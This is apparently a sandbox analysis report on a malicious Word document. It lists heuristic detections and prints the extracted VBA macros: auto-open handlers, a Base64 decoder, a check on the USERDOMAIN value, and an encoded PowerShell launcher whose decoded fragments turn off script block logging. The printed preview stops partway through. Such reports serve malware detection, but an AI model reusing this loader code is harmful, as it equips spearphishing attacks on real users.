MALICIOUS
Risk Score: 310
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros designed to execute automatically upon opening. Critical heuristics indicate an auto-exec loader that decodes and executes a payload. The VBA code attempts to decode a Base64 string, which is likely a second-stage payload, and execute it using GetObject and Shell functions.
Heuristics (10)
- VBA macros detected (medium, 7 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- Auto_Open macro (high) OLE_VBA_AUTO: Auto_Open macro
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low) OLE_VBA_ENVIRON: Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10239 bytes | d797116934793c34c50d8379aef43f112a46c3293d9bc15d564a41ab284e17b8 |
Preview script: first 1,000 lines of the extracted VBA script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
SetRSI
End Sub
Sub AutoOpen()
SetRSI
End Sub
Sub Document_Open()
SetRSI
End Sub
'
' 1)
'
Public Function computeAndSearch(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "computeAndSearch", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If
If thisData = -1 Then
Err.Raise 2, "computeAndSearch", "Bad character In Base64 string."
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
computeAndSearch = sOut
End Function
Public Function SetRSI() As Variant
Dim formula As String
If (StrComp(Environ("USERDOMAIN"), "CORP", vbTextCompare) = 0) Then
getKPI
Else
Exit Function
End If
End Function
Public Function getKPI() As Variant
Dim formula As String
'
' 2)
'
formula = computeAndSearch("cG93ZXJzaGVsbCAtbm9QIC1zdGEgLXcgMSAtZW5jICBTUUJHQUNnQUpBQlFBRk1BVmc=")
'
' 3)
'
formula = formula + "BlAFIAcwBpAE8AbgBUAEEAYgBsAGUALgBQAFMAVgBFAFIAcwBp"
formula = formula + "AG8AbgAuAE0AQQBqAG8AcgAgAC0ARwBlACAAMwApAHsAJABHAF"
formula = formula + "AARgA9AFsAcgBlAEYAXQAuAEEAcwBzAEUATQBCAGwAeQAuAEcA"
formula = formula + "ZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
formula = formula + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBV"
formula = formula + "AHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAEkARQBgAEwARAAiAC"
formula = formula + "gAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkA"
formula = formula + "UwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQ"
formula = formula + "BiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABH"
formula = formula + "AFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAG"
formula = formula + "EAbAB1AGUAKAAkAG4AVQBsAEwAKQA7AEkAZgAoACQARwBQAEMA"
formula = formula + "WwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZw"
formula = formula + "BnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBw"
formula = formula + "AHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
formula = formula + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwA"
formula = formula + "bwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQw"
formula = formula + "BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBn"
formula = formula + "AGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAH"
formula = formula + "AAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8A"
formula = formula + "ZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBsAD0AWwBDAE8ATA"
formula = formula + "BsAGUAQwBUAEkAbwBuAFMALgBHAGUATgBlAFIASQBDAC4ARABp"
formula = formula + "AGMAVABJAE8AbgBBAHIAeQBbAFMAdABSAEkAbgBnACwAUwBZAH"
formula = formula + "MA
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1567263903/Ole10Native | 3844 bytes | c10c370c13d22d7ac75e5c06e9297bb5dde4cf9b621ddd09ed082252cd84d4ce |